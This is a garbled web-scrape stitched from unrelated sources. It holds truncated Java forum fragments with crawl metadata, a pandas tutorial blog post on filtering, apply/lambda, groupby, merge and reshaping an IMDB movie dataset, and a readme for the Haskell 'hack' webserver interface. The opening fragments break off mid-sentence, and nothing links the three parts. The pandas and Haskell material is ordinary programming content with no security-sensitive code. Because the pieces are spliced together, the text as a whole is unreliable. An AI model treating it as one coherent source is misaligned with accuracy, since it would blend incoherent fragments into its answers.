What I am struggling with is how to write a code... and Season headings).
Here's some code I have so far:
to display all
Programming - Transform Name - GUI 0
Java: Programming - Transform Name - GUI 0
Write a GUI program to redisplay a name, possibly transformed.
This Java program will reformat a user's name... be good extra credit for this
program. You can easily use the Java functions
java code
java code develop a banking system in java | http://www.roseindia.net/tutorialhelp/comment/90714 | CC-MAIN-2014-10 | refinedweb | 2,534 | 54.83 |
Minimal Pandas Subset for Data Scientists
Pandas is a vast library.
Data manipulation is a breeze with pandas, and it has become such a standard for it that a lot of parallelization libraries like Rapids and Dask are being created in line with Pandas syntax.
Still, I generally have some issues with it.
There are multiple ways to doing the same thing in Pandas, and that might make it troublesome for the beginner user.
This has inspired me to come up with a minimal subset of pandas functions I use while coding.
I have tried it all, and currently, I stick to a particular way. It is like a mind map.
Sometimes because it is fast and sometimes because it’s more readable and sometimes because I can do it with my current knowledge. And sometimes because I know that a particular way will be a headache in the long run(think multi-index)
This post is about handling most of the data manipulation cases in Python using a straightforward, simple, and matter of fact way.
With a sprinkling of some recommendations throughout.
I will be using a data set of 1,000 popular movies on IMDB in the last ten years. You can also follow along in the Kaggle Kernel.
Some Default Pandas Requirements
As good as the Jupyter notebooks are, some things still need to be specified when working with Pandas.
***Sometimes your notebook won’t show you all the columns. Sometimes it will display all the rows if you print the dataframe. ***You can control this behavior by setting some defaults of your own while importing Pandas. You can automate it using this addition to your notebook.
For instance, this is the setting I use.
import pandas as pd # pandas defaults pd.options.display.max_columns = 500 pd.options.display.max_rows = 500
Reading Data with Pandas
The first thing we do is reading the data source and so here is the code for that.
df = pd.read_csv("IMDB-Movie-Data.csv")
Recommendation: I could also have used pd.read_table to read the file. The thing is that pd.read_csv has default separator as , and thus it saves me some code. I also genuinely don’t understand the use of pd.read_table
If your data is in some SQL Datasource, you could have used the following code. You get the results in the dataframe format.
#" df = read_sql(query, db)
Data Snapshot
Always useful to see some of the data.
You can use simple head and tail commands with an option to specify the number of rows.
# top 5 rows df.head() # top 50 rows df.head(50) # last 5 rows df.tail() # last 50 rows df.tail(50)
You can also see simple dataframe statistics with the following commands.
# To get statistics of numerical columns df.describe()
# To get maximum value of a column. When you take a single column you can think of it as a list and apply functions you would apply to a list. You can also use min for instance. print(max(df['rating'])) # no of rows in dataframe print(len(df)) # Shape of Dataframe print(df.shape)
9.0 1000 (1000,12)
Recommendation: Generally working with Jupyter notebook,I make it a point of having the first few cells in my notebook containing these snapshots of the data. This helps me see the structure of the data whenever I want to. If I don’t follow this practice, I notice that I end up repeating the
.head() command a lot of times in my code.
Handling Columns in Dataframes
a. Selecting a column
For some reason Pandas lets you choose columns in two ways. Using the dot operator like
df.Title and using square brackets like
df['Title']
I prefer the second version, mostly. Why?
There are a couple of reasons you would be better off with the square bracket version in the longer run.
If your column name contains spaces, then the dot version won’t work. For example,
df.Revenue (Millions)won’t work while
df['Revenue (Millions)']will.
It also won’t work if your column name is
countor
meanor any of pandas predefined functions.
Sometimes you might need to create a for loop over your column names in which your column name might be in a variable. In that case, the dot notation will not work. For Example, This works:
colname = 'height' df[colname]
While this doesn’t:
colname = 'height' df.colname
Trust me. Saving a few characters is not worth it.
Recommendation: Stop using the dot operator. It is a construct that originated from a different language® and respectfully should be left there.
b. Getting Column Names in a list
You might need a list of columns for some later processing.
columnnames = df.columns
c. Specifying user-defined Column Names:
Sometimes you want to change the column names as per your taste. I don’t like spaces in my column names, so I change them as such.
df.columns = ['Rank', 'Title', 'Genre', 'Description', 'Director', 'Actors', 'Year', 'Runtime_Minutes', 'Rating', 'Votes', 'Revenue_Millions', 'Metascore']
I could have used another way.
This is the one case where both of the versions are important. When I have to change a lot of column names, I go with the way above. When I have to change the name of just one or two columns I use:
df.rename(columns = {'Revenue (Millions)':'Rev_M','Runtime (Minutes)':'Runtime_min'},inplace=True)
d. Subsetting specific columns:
Sometimes you only need to work with particular columns in a dataframe. e.g., to separate numerical and categorical columns, or remove unnecessary columns. Let’s say in our example; we don’t need the description, director, and actor column.
df = df[['Rank', 'Title', 'Genre', 'Year','Runtime_min', 'Rating', 'Votes', 'Rev_M', 'Metascore']]
e. Seeing column types:
Very useful while debugging. If your code throws an error that you cannot add a str and int, you will like to run this command.
df.dtypes
Applying Functions on DataFrame: Apply and Lambda
apply and
lambda are some of the best things I have learned to use with pandas.
I use
apply and
lambda anytime I get stuck while building a complex logic for a new column or filter.
a. Creating a Column
But sometimes we may need to build complex logic around the creation of new columns.
To give you a convoluted example, let’s say that we want to build a custom movie score based on a variety of factors.
Say, If the movie is of the thriller genre, I want to add 1 to the IMDB rating subject to the condition that IMDB rating remains less than or equal to 10. And If a movie is a comedy I want to subtract one from the rating.
How do we do that?
Whenever I get a hold of such complex problems, I use
apply/lambda. Let me first show you how I will do this.
def custom_rating(genre,rating): if 'Thriller' in genre: return min(10,rating+1) elif 'Comedy' in genre: return max(0,rating-1) else: return rating df['CustomRating'] = df.apply(lambda x: custom_rating(x['Genre'],x['Rating']),axis=1)
The general structure is:
You define a function that will take the column values you want to play with to come up with your logic. Here the only two columns we end up using are genre and rating.
You use an apply function with lambda along the row with axis=1. The general syntax is:
df.apply(lambda x: func(x['col1'],x['col2']),axis=1)
You should be able to create pretty much any logic using apply/lambda since you just have to worry about the custom function.
b. Filtering a dataframe
Pandas make filtering and subsetting dataframes pretty easy. You can filter and subset dataframes using normal operators and
&,|,~ operators.
# Single condition: dataframe with all movies rated greater than 8 df_gt_8 = df[df['Rating']>8] # Multiple conditions: AND - dataframe with all movies rated greater than 8 and having more than 100000 votes And_df = df[(df['Rating']>8) & (df['Votes']>100000)] # Multiple conditions: OR - dataframe with all movies rated greater than 8 or having a metascore more than 90 Or_df = df[(df['Rating']>8) | (df['Metascore']>80)] # Multiple conditions: NOT - dataframe with all emovies rated greater than 8 or having a metascore more than 90 have to be excluded Not_df = df[~((df['Rating']>8) | (df['Metascore']>80))]
Pretty simple stuff.
But sometimes we may need to do complex filtering operations.
And sometimes we need to do some operations which we won’t be able to do using just the above format.
For instance: Let us say we want to filter those rows where the number of words in the movie title is greater than or equal to than 4.
How would you do it?
Trying the below will give you an error. Apparently, you cannot do anything as simple as split with a series.
new_df = df[len(df['Title'].split(" "))>=4]
AttributeError: 'Series' object has no attribute 'split'
One way is first to create a column which contains no of words in the title using apply and then filter on that column.
#create a new column df['num_words_title'] = df.apply(lambda x : len(x['Title'].split(" ")),axis=1) #simple filter on new column new_df = df[df['num_words_title']>=4]
And that is a perfectly fine way as long as you don’t have to create a lot of columns. But I prefer this:
new_df = df[df.apply(lambda x : len(x['Title'].split(" "))>=4,axis=1)]
What I did here is that my apply function returns a boolean which can be used to filter.
Now once you understand that you just have to create a column of booleans to filter, you can use any function/logic in your apply statement to get however complex a logic you want to build.
Let us see another example. I will try to do something a little complex to show the structure.
We want to find movies for which the revenue is less than the average revenue for that particular year?
year_revenue_dict = df.groupby(['Year']).agg({'Rev_M':np.mean}).to_dict()['Rev_M'] def bool_provider(revenue, year): return revenue<year_revenue_dict[year] new_df = df[df.apply(lambda x : bool_provider(x['Rev_M'],x['Year']),axis=1)]
We have a function here which we can use to write any logic. That provides a lot of power for advanced filtering as long as we can play with simple variables.
c. Change Column Types
I even use apply to change the column types since I don’t want to remember the syntax for changing column type and also since it lets me do much more complicated things.
The usual syntax to change column type is astype in Pandas. So if I had a column named price in my data in an str format. I could do this:
df['Price'] = newDf['Price'].astype('int')
But sometimes it won’t work as expected.
You might get the error:
ValueError: invalid literal for long() with base 10: ‘13,000’. That is you cannot cast a string with “,” to an int. To do that we first have to get rid of the comma.
After facing this problem time and again, I have stopped using astype altogether now and just use apply to change column types.
df['Price'] = df.apply(lambda x: int(x['Price'].replace(',', '')),axis=1)
And lastly, there is progress_apply
progress_apply is a function that comes with
tqdm package.
And this has saved me a lot of time.
Sometimes when you have got a lot of rows in your data, or you end up writing a pretty complex apply function, you will see that apply might take a lot of time.
I have seen apply taking hours when working with Spacy. In such cases, you might like to see the progress bar with
apply.
You can use
tqdm for that.
After the initial imports at the top of your notebook, just replace
apply with
progress_apply and everything remains the same.
from tqdm import tqdm, tqdm_notebook tqdm_notebook().pandas() df.progress_apply(lambda x: custom_rating_function(x['Genre'],x['Rating']),axis=1)
And you get progress bars.
Recommendation:vWhenever you see that you have to create a column with custom complex logic, think of apply and lambda. Try using progress_apply too.
Aggregation on Dataframes: groupby
groupby will come up a lot of times whenever you want to aggregate your data. Pandas lets you do this efficiently with the groupby function.
There are a lot of ways that you can use groupby. I have seen a lot of versions, but I prefer a particular style since I feel the version I use is easy, intuitive, and scalable for different use cases.
df.groupby(list of columns to groupby on).aggregate({'colname':func1, 'colname2':func2}).reset_index()
Now you see it is pretty simple. You just have to worry about supplying two primary pieces of information.
List of columns to groupby on, and
A dictionary of columns and functions you want to apply to those columns
reset_index() is a function that resets the index of a dataframe. I apply this function ALWAYS whenever I do a groupby, and you might think of it as a default syntax for groupby operations.
Let us check out an example.
# Find out the sum of votes and revenue by year import numpy as np df.groupby(['Year']).aggregate({'Votes':np.sum, 'Rev_M':np.sum}).reset_index()
You might also want to group by more than one column. It is fairly straightforward.
df.groupby(['Year','Genre']).aggregate({'Votes':np.sum, 'Rev_M':np.sum}).reset_index()
Recommendation: Stick to one syntax for groupby. Pick your own if you don’t like mine but stick to one.
Dealing with Multiple Dataframes: Concat and Merge:
a. concat
Sometimes we get data from different sources. Or someone comes to you with multiple files with each file having data for a particular year.
How do we create a single dataframe from a single dataframe?
Here we will create our use case artificially since we just have a single file. We are creating two dataframes first using the basic filter operations we already know.
movies_2006 = df[df['Year']==2006] movies_2007 = df[df['Year']==2007]
Here we start with two dataframes:
movies_2006 containing info for movies released in 2006 and
movies_2007 containing info for movies released in 2007. We want to create a single dataframe that includes movies from both 2006 and 2007
movies_06_07 = pd.concat([movies_2006,movies_2007])
b. merge
Most of the data that you will encounter will never come in a single file. One of the files might contain ratings for a particular movie, and another might provide the number of votes for a movie.
In such a case we have two dataframes which need to be merged so that we can have all the information in a single view.
Here we will create our use case artificially since we just have a single file. We are creating two dataframes first using the basic column subset operations we already know.
rating_dataframe = df[['Title','Rating']] votes_dataframe = df[['Title','Votes']]
We need to have all this information in a single dataframe. How do we do this?
rating_vote_df = pd.merge(rating_dataframe,votes_dataframe,on='Title',how='left') rating_vote_df.head()
We provide this merge function with four attributes- 1st DF, 2nd DF, join on which column and the joining criteria:
['left','right','inner','outer']
Recommendation: I usually always end up using left join. You will rarely need to join using outer or right. Actually whenever you need to do a right join you actually just really need a left join with the order of dataframes reversed in the merge function.
Reshaping Dataframes: Melt and pivot_table(reverseMelt)
Most of the time, we don’t get data in the exact form we want.
For example, sometimes we might have data in columns which we might need in rows.
Let us create an artificial example again. You can look at the code below that I use to create the example, but really it doesn’t matter.
genre_set = set() for genre in df['Genre'].unique(): for g in genre.split(","): genre_set.add(g) for genre in genre_set: df[genre] = df['Genre'].apply(lambda x: 1 if genre in x else 0) working_df = df[['Title','Rating', 'Votes', 'Rev_M']+list(genre_set)] working_df.head()
So we start from a
working_df like this:
Now, this is not particularly a great structure to have data in. We might like it better if we had a dataframe with only one column Genre and we can have multiple rows repeated for the same movie. So the movie ‘Prometheus’ might be having three rows since it has three genres. How do we make that work?
We use
melt:
reshaped_df = pd.melt(working_df,id_vars = ['Title','Rating','Votes','Rev_M'],value_vars = list(genre_set),var_name = 'Genre', value_name ='Flag') reshaped_df.head()
So in this melt function, we provided five attributes:
dataframe_name = working_df
id_vars: List of vars we want in the current form only.
value_vars: List of vars we want to melt/put in the same column
var_name: name of the column for value_vars
value_name: name of the column for value of value_vars
There is still one thing remaining. For Prometheus, we see that it is a thriller and the flag is 0. The flag 0 is unnecessary data we can filter out, and we will have our results. We keep only the genres with flag 1
reshaped_df = reshaped_df[reshaped_df['Flag']==1]
What if we want to go back?
We need the values in a column to become multiple columns. How? We use
pivot_table
re_reshaped_df = reshaped_df.pivot_table(index=['Title','Rating','Votes','Rev_M'], columns='Genre', values='Flag', aggfunc='sum').reset_index() re_reshaped_df.head()
We provided four attributes to the pivot_table function.
index: We don’t want to change these column structures
columns: explode this column into multiple columns
values: use this column to aggregate
aggfunc: the aggregation function.
We can then fill the missing values by 0 using
fillna
re_reshaped_df=re_reshaped_df.fillna(0)
Recommendation: Multiple columns to one column: melt and One column to multiple columns: pivot_table . There are other ways to do melt — stack and different ways to do pivot_table: pivot,unstack. Stay away from them and just use melt and pivot_table. There are some valid reasons for this like unstack and stack will create multi-index and we don’t want to deal with that, and pivot cannot take multiple columns as the index.
Conclusion
With Pandas, less choice is more
Here I have tried to profile some of the most useful functions in pandas I end up using most often.
Pandas is a vast library with a lot of functionality and custom options. That makes it essential that you should have a mindmap where you stick to a particular syntax for a specific thing.
Here I have shared mine, and you can proceed with it and make it better as your understanding of the library grows.
I hope you found this post useful and worth your time. I tried to make this as simple as possible, but you may always ask me or see the documentation for doubts.
Whole code and data are posted in the Kaggle Kernel.
Also, if you want to learn more about Python 3, I would like to call out an excellent course on Learn Intermediate level Python from the University of Michigan. Do check it out.
I am going to be writing more of such posts in the future too. Let me know what you think about them. Follow me up at Medium or Subscribe to my blog to be informed about them. As always, I welcome feedback and constructive criticism and can be reached on Twitter @mlwhiz. | https://mlwhiz.com/blog/2019/07/20/pandas_subset/ | CC-MAIN-2020-16 | refinedweb | 3,266 | 65.42 |
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
Odoo v8: can't write into website field (model: res.partner)
I've created my own field company_origin. It is only visible if the partner (res.partner modell) is a company.
The field company_origin is a Many2one field, related to a modell origin which i added to res_partner.
My Problem is that i can't write values into the children of the company. For some fields it works (e.g. street) but for some it doesn't. (e.g. website). I also can not write the fields that i added to res.partner with my own model.
Here is some code that shows my problem, street changes but website doesnt (both are fields.Char() fields).
@api.onchange('company_origin')
def _set_children_origin(self):
if self.child_ids != False:
#--------------------------#
for child in self.child_ids:
child.street = "teststreet"
child.website = "testsite"
Thanks, for any advice.
see documentation (not tested) :
Many2many One2many Behavior
One2many and Many2many fields have some special behavior to be taken in account. At that time (this may change at release) using create on a multiple relation fields will not introspect to look for the relation.
self.line_ids.create({'name': 'Tho'}) # this will fail as order is not set
self.line_ids.create({'name': 'Tho', 'order_id': self.id}) # this will work
self.line_ids.write({'name': 'Tho'}) # this will write all related lines
About This Community
Odoo Training Center
Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
Both fields are in the view xml?
Yes i can see both fields and they are defined in res.partner (view). I use _inherit=res.partner in my modell to add new elements. But those two fields both are untouched. I really would like to know why i can not write into child.website. Thanks for your reply. | https://www.odoo.com/forum/help-1/question/odoo-v8-can-t-write-into-website-field-model-res-partner-83256 | CC-MAIN-2017-51 | refinedweb | 331 | 69.99 |
Hi,
I have some quarries on GPIO for OMAPL138 LINUX-2.6.33.
1.) Please provide the user usage information of GPIO driver, on Linux-2.6.33.
2.) How to access GPIO pin on user side like gpio_request(); gpio_request_input(); etc
3.) what are the user API for accessing the gpio. for linx application.
4.) And i checked the /sys/class/gpio is present .
Thanks in adv
Ram
Hi Ram,
Go through kernel documentation "Documentation/gpio.txt" for more details
Regards
AnilKumar
Noticed in your other forum threads that you have some confustion between the kernel and user space interfaces to GPIOS. User space access to the sysfs GPIO driver is all through files. Here's an example to toggling GPIO 11 in a Linux console or terminal:
cd /sys/class/gpio/echo 11 > exportcd gpio11echo out > directionecho 0 > valueecho 1 > valueecho 0 > value
The equivalent code in C is:
#include <fcntl.h> /* For open() */#include <unistd.h> /* For read(), close() */int main(int argc, char *argv[]){ int fd; fd = open("/sys/class/gpio/export", O_WRONLY); write(fd, "11", 3); // Include null! close(fd); fd = open("/sys/class/gpio/gpio11/direction", O_WRONLY); write(fd, "out", 4); close(fd); fd = open("/sys/class/gpio/gpio11/value", O_WRONLY); write(fd, "0", 2); write(fd, "1", 2); write(fd, "0", 2); close(fd); return(0);}
Please take note that you must check that the GPIO line you want to use is pinmux'ed to an external pin. That involves looking at the kernel code and possibly modifiying the kernel.
Thanks for your above example to toggle gpio....
Hi, if I want set GP2[3] to out direction .And set it to 1 or 0, how can I use the function write and open?\
fd = open("/sys/class/gpio/export", O_WRONLY); write(fd, "??", ??); // Include null! close(fd);
fd = open("/sys/class/gpio/gpio11/direction", O_WRONLY); write(fd, "??", ??); close(fd);
fd = open("/sys/class/gpio/gpio11/value", O_WRONLY); write(fd, "0", ??);
write(fd, buf, len);
fd - file pointer
buf - contains characters ex: "1" or "0" or "in" or "out"
len - length of the buffer ex: 2 or 2 or 3 or 4.
Please mark this Forum post as answered via the Verify Answer button below if it helps answer your question. Thanks!
Hi,
#include <fcntl.h> /* For open() */#include <unistd.h> /* For read(), close() */int main(int argc, char *argv[]){ int fd; fd = open("/sys/class/gpio/export", O_WRONLY); write(fd, "11", 3); // Include null!
what's the meaning of write(fd, "11", 3); // Include null!
He
This means writing 11 into export file.
Hi AnilKumar
I don't know what the "11" mean. if i want control GP1[1], in the OMAPL138 datasheet:
GPIO Register Bits and Banks Associated With GPIO Signals
GPIO Pin Number GPIO Signal Name Bank Number Control Registers Register Bit Register Field
1 GP0[0] 0 register_name01 Bit 0 GP0P0
2 GP0[1] 0 register_name01 Bit 1 GP0P1
…… …… ……
18 GP1[1] 1 register_name01 Bit 17 GP1P1
Can I use it like this write(fd,“18",3) ? right?
int fd; fd = open("/sys/class/gpio/export", O_WRONLY); write(fd, "18", 3); // Include null! close(fd);
fd = open("/sys/class/gpio/gpio18/direction", O_WRONLY); write(fd, "out", 4); close(fd);
fd = open("/sys/class/gpio/gpio18/value", O_WRONLY); while(1){ write(fd, "0", 2); sleep(3); write(fd, "1", 2); sleep(3); } close(fd);
When I detect the pin GP1[1], I can't get the value I set to it . Why?
Hi He,
The way you are using are correct,
Make sure that pinmux settings are proper, refer OMAPL138 GPIO user guide for more details
Below post will help you on GPIO functionality.
Hi,AnilKuma
Thank you for your quick reply. But I still have problem to find the pinmux setting fuction.
after rebuilt the kernel When I detect the pin GP1[1], I still can't get the value I set to it . Is I wrong? Is there any other place I must modify?
Hi Ram
Do you solve you problem? I have the same problems with you ?
Are you success setting pinmux? How to do it.
Below is my problems.
Hi NormanI have some trobles in pinmux settingsafter rebuilt the kernel When I detect the pin GP1[1], I still can't get the value I set to it . Is I wrong? Is there any other place I must modify?
RegardsHe
Make sure that you have written the correct value to corresponding register
Hi Anil
I do it like this:
# echo 18 > /sys/class/gpio/export~# ls /sys/class/gpio/gpio18active_low edge subsystem valuedirection power uevent:~# echo out > /sys/class/gpio/gpio18/direction~# echo 0 > /sys/class/gpio/gpio18/value~# cat /sys/class/gpio/gpio18/value1~# echo 1 > /sys/class/gpio/gpio18/value~# cat /sys/class/gpio/gpio18/value1
~# echo 0 > /sys/class/gpio/gpio18/value~# cat /sys/class/gpio/gpio18/value1
why the value can not be change? when I use "echo 29 > /sys/class/gpio/export " , the export29 value can changed as I set.
The file 'value' is R/W.
Did you call "davinci_cfg_reg(gpio_pin)" to set pinmux for gpio18 besides adding entries in mux.h and da850.c?
BTW, gpio1[1] is gpio17 instead of gpio18.
Regards,
Yan
Make sure that you are configuring the same GPIO pin.
You are trying to add pinmux for GPIO1_1 (18th gpio pin) means gpio 17 in your previous post.
Here you are changing the value of gpio 18 (19th pin), use the same GPIO at both the places
Can you check these
echo 17 > /sys/class/gpio/export
echo "out" > /sys/class/gpio/gpio17/direction
echo 0 > /sys/class/gpio/gpio17/value
echo 1 > /sys/class/gpio/gpio17/value
Note: Can you check the status of pinmux register after kernel boots. | http://e2e.ti.com/support/embedded/linux/f/354/p/156212/574819.aspx | CC-MAIN-2013-20 | refinedweb | 962 | 64.71 |
This is a C++ Program to implement Boyer-Moore algorithm..
Here is source code of the C++ Program to Implement Boyer-Moore Algorithm for String Matching. The C++ program is successfully compiled and run on a Linux system. The program output is also shown below.
/* Program for Bad Character Heuristic of Boyer Moore String Matching Algorithm */
# include <limits.h>
# include <string.h>
# include <stdio.h>
# define NO_OF_CHARS 256
// A utility function to get maximum of two integers
int max(int a, int b)
{
return (a > b) ? a : b;
}
// The preprocessing function for Boyer Moore's bad character heuristic
void badCharHeuristic(char *str, int size, int badchar[NO_OF_CHARS])
{
int i;
// Initialize all occurrences as -1
for (i = 0; i < NO_OF_CHARS; i++)
badchar[i] = -1;
// Fill the actual value of last occurrence of a character
for (i = 0; i < size; i++)
badchar[(int) str[i]] = i;
}
void search(char *txt, char *pat)
{
int m = strlen(pat);
int n = strlen(txt);
int badchar[NO_OF_CHARS];
badCharHeuristic(pat, m, badchar);
int s = 0; // s is shift of the pattern with respect to text
while (s <= (n - m))
{
int j = m - 1;
while (j >= 0 && pat[j] == txt[s + j])
j--;
if (j < 0)
{
printf("\n pattern occurs at shift = %d", s);
s += (s + m < n) ? m - badchar[txt[s + m]] : 1;
}
else
s += max(1, j - badchar[txt[s + j]]);
}
}
/* Driver program to test above funtion */
int main()
{
char txt[] = "ABAAABCD";
char pat[] = "ABC";
search(txt, pat);
return 0;
}
Output:
$ g++ Boyer-Moore.cpp $ a.out pattern occurs at shift = 4 ------------------ (program exited with code: 0) Press return to continue
Sanfoundry Global Education & Learning Series – 1000 C++ Programs.
Here’s the list of Best Reference Books in C++ Programming, Data Structures and Algorithms. | https://www.sanfoundry.com/cpp-program-implement-boyer-moore-algorithm-string-matching/ | CC-MAIN-2018-13 | refinedweb | 288 | 58.11 |
It has been a bit less than 4 years since I first heard the term serverless and only around 3 years since I got my hands dirty with it. As a beginner, I agreed that it’s less servers to manage, but anything else was more. It was more complex to build event-driven serverless applications, harder to secure as serverless shifts security responsibilities to developers, and harder to achieve observability as events go in and out between services simultaneously. Since then, many of those problems have been tackled with the innovation of great products. However, one thing remains constant: the learning curve is very steep, and serverless is far from easy.
Serverless as it’s meant to be
That’s what made me passionate about the Serverless Cloud when Jeremy first told me about it. We are calling our innovation "serverless as it’s meant to be" and it really is. It gives developers the ability to build Express.js-like APIs with a familiar syntax for accessing built-in data, secrets, and building scheduled tasks. All the infrastructure is automatically spun up and abstracted away. You need to focus on the code and only the code. Our own Doug Moscrop coined this as infrastructure-from-code and very recently, Shawn Wang envisioned a similar vision and called this self-provisioning-runtime. Last week, we went out of beta and made into the exclusive launch of the Serverless Cloud. The comments so far are so great that it puts pressure on us to keep the Serverless Cloud as lean and as efficient as possible.
Mike Lamb@letslamb@goserverless Serverless Cloud is so awesome.
Can’t wait to finish up this little bit of client work so I can get back to playing with it & send more feedback.
What a time to be in tech17:59 PM - 07 Sep 2021
Serverless Data
Serverless Cloud leads an opinionated paradigm not only for APIs but also for the databases of modern applications. After watching Rick Houlihan's great talk and reading Alex DeBrie's great book I was sold on the single table design for many use cases. However, incorporating best practices into your data layer is easier said than done.The great news is that all of those best practices are already baked in Serverless Data thanks to Jeremy's previous experience with OSS work. You can manipulate Serverless Data simply by using get and set commands. You can define namespaces on the fly for your data and query with conditional operators. You can use labels to pivot and access your data for different views. In this way, you can add another dimension to your K/V storage and retrieve accordingly. See the docs for more information. I strongly recommend watching the chat between Rick Houlihan and Jeremy about the thought process behind the implementation of Serverless Data.
The future of Serverless Cloud
A continuous flow of feedback from multiple sources is every product manager's dream, and I'm currently living it. I’m really grateful for the buzz on social media about Serverless Cloud as it helped us look from different angles at our own product. Even before that, early beta users were helping tremendously to shape our features. We are not sticking to a long term roadmap, but there are several features that we’ll definitely add in the near future.
First of all, Serverless Cloud can’t be without events! We’ll be adding several event types to Serverless Cloud, like triggering functions on a record update and for inter- and intra-service communication. Second, we’ll give our users the ability to assign custom domains so you can share your Serverless Cloud applications with the world. Third, we’ll make the portability of existing Express apps easier so that you can migrate existing app into the Serverless Cloud with minimal effort.
Wrapping up
Software means something as long as it serves its business objectives. We want to let developers get rid of anything that distracts them from focusing on the business logic. We are still early, but we envision a world where all the infrastructure can be inferred from code. Serverless Cloud is ready for developers to build applications and deliver value to end users in the fastest way possible. We have granted access for a limited number of users in the scope of our exclusive launch and we’ll start to put newcomers on to the waitlist soon. If you want to be part of this journey, get your seat in our exclusive launch before it ends.
Discussion (0) | https://practicaldev-herokuapp-com.global.ssl.fastly.net/emrahsamdan/to-the-future-with-serverless-cloud-379k | CC-MAIN-2022-21 | refinedweb | 764 | 61.36 |
DES_CRYPT(3) Linux Programmer's Manual DES_CRYPT(3)
des_crypt, ecb_crypt, cbc_crypt, des_setparity, DES_FAILED - fast DES encryption
#include <rpc/des_crypt.h> int ecb_crypt(char *key, char *data, unsigned int datalen, unsigned int mode); int cbc_crypt(char *key, char *data, unsigned int datalen, unsigned int.──────────────┴───────────────┴─────────┘
4.3BSD. Not in POSIX.1.
des(1), crypt(3), xcrypt(3)
This page is part of release 5.11 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. 2021-03-22 DES_CRYPT(3)
Pages that refer to this page: encrypt(3), xcrypt(3) | https://man7.org/linux/man-pages/man3/cbc_crypt.3.html | CC-MAIN-2021-25 | refinedweb | 104 | 67.65 |
Introduction
In this article we will learn some basics of ASP.Net MVC applications. In my last
article you read a lot about ASP.Net MVC. You can read those articles from the links given below.
After reading the previous articles I think
you are now aware of ASP.Net MVC. So let's see some basic structures of ASP.Net
MVC applications. In this article we will see how to start an ASP.Net MVC
application. What are the prerequisites? And Simple Graph in ASP.Net MVC? Prerequisites
As you know ASP.Net MVC is available in various versions like MVC1, MVC2, and
MVC3 etc. In this article we are using MVC3. So download the MVC3 from here.
Starting an ASP.Net MVC Application
After installing ASP.Net MVC3 we can create our new ASP.Net MVC3 application so
let's open your Visual Studio and select ASP.NET MVC3 Web Application from the
new project dialog as shown in the following screenshot.
After selecting ASP.NET MVC3 Web Application it will display one more screen to
select your view engine and type of application like empty website, Internet and
Intranet so in this screen select Empty and in the view engine select aspx view
engine; here we have one more view engine i.e. razor as well as we have one more
advanced support to use HTML5 as markup language.
From the above screen we have to select Empty application and ASPX as our view
engine as well check the chechbox to use HTML5 semantic markup. After this
selection our application is created and the one predefined structure is
available; just open the Solution Explorer and see the structure.
In the above screen you can see already some folders are created with
Controllers, Models and Views. Now our task is create first one controller so
let's create it by right-click and select add controller option which will ask
the name of controller like shown in the following screen.
Here it's MVC standard for controller name. You can see I've added
GraphController as the name for the controller you can change it as you want but
keep in mind your controller name must be postfixed with the controller word. After
adding this controller you can see the Default Index method is available in
the controller and this GraphController is extended from the base Controller class. public class GraphController :
Controller {
// // GET: /Graph/
public ActionResult Index()
{
return View();
} }
From the above steps now you know how to create MVC applications and add
the controller to the application. Next we have to add a view related to the methods
present in the controller. So add one view for the index method to show on startup
which will contain one ActionLink to display the graph. To add a view right-click
in Method and select Add View as shown below.
From the above screen you see how to add a view to an ASP.NET MVC application.
Now whenever we call any method then the respective view will be rendered in
the client browser. You can keep the actionlink in the Index.aspx using the following line
of code. <%=Html.ActionLink("View
Graph", "Graph")%>
In the above line you can see we have created a Html.ActionLink which takes View Graph
and Graph as arguments; here View Graph is the text given to display and Graph is
the action name in the controller. Next we will see how to prepare the graph; for
this task we must add one more method in GraphController with the name
Graph so copy and paste this method in GraphController. public ActionResult Graph()
{
string[] _xval = {
"vulpes", "Sp
Nayak", "Krishna","Datta
Kharad","Prabhu Raja" };
string[] _yval = {
"235", "130",
"30","25","15"
};
//here the chart is going on var bytes =
new Chart(width:
600, height: 300)
.AddSeries(
chartType: "Column",legend:"Mindcracker
Current Month Runner up",
xValue: _xval,
yValues: _yval)
.GetBytes("png");
return File(bytes,
"image/png");
}
Before adding this method to the controller we need to add one using statement to
System.Web.Helpers which contains the Chart. In the above method you can see we have
created a string[] which is nothing but the data for our graph and we have
created a chart which will take some arguments like charttype, legend and the
values to display on the graph and this method will return File of bytes. Configure Routing
When we create any MVC application our default routing is configured like
bellow. public static void RegisterRoutes(RouteCollection
routes)
{
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.MapRoute(
"Default",
// Route name "{controller}/{action}/{id}",
// URL with parameters new { controller =
"Home", action =
"Index", id = UrlParameter.Optional }
// Parameter defaults );
}
Here it will consider the default controller as Home but since this is an empty
application we don't have a Home controller in our application so we need to
change this default Home controller with our Graph controller so just change
Home to Graph like below. public static void RegisterRoutes(RouteCollection
routes)
{
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.MapRoute(
"Default",
// Route name "{controller}/{action}/{id}",
// URL with parameters new { controller =
"Graph", action =
"Index", id = UrlParameter.Optional }
// Parameter defaults );
} Output
The output will look like the followong screen. Conclusion
In this way we can start working on ASP.Net MVC and easily prepare the Graph
for a MVC application.
Display Graph in ASP.NET MVC
Routing in MVC
Thanks Aaron. I used var because Chart returns the byte of image and var can be any type.
Nicely explained.
Thanks guys
understandable........thank you very much for sharing....
Very nicely presented article. | http://www.c-sharpcorner.com/UploadFile/krishnasarala/display-graph-in-Asp-Net-mvc/ | crawl-003 | refinedweb | 931 | 65.62 |
The hack package
Hack: a Haskell Webserver Interface
Properties
Downloads
- hack-2009.10.30.tar.gz [browse] (Cabal source package)
- Package description (included in the package)
Maintainer's Corner
For package maintainers and hackage trustees
Readme for hack
Readme for hack-2009.10.30
Hack: a Haskell Webserver Interface
Hack is a port of the Ruby's Rack webserver interface, which itself inspired by Python's WSGI.
Version
2009.10.30
Introduction
Idea
Separation of concerns:
- hack: interface spec
- hack-middleware: building blocks
- hack-handler: server backends
Design
type Application = Env -> IO Response
Demo
import Hack import Hack.Handler.Happstack import Data.ByteString.Lazy.Char8 (pack) app :: Application app = \env -> return $ Response 200 [ ("Content-Type", "text/plain") ] (pack "Hello World") main = run app, but is always required!
-.
- remoteHost: The remote host of this request
- http: http headers, intended to be used by handlers and middleware.
- hackCache: High performance cache, could be used by handlers and middleware.
pick a backend
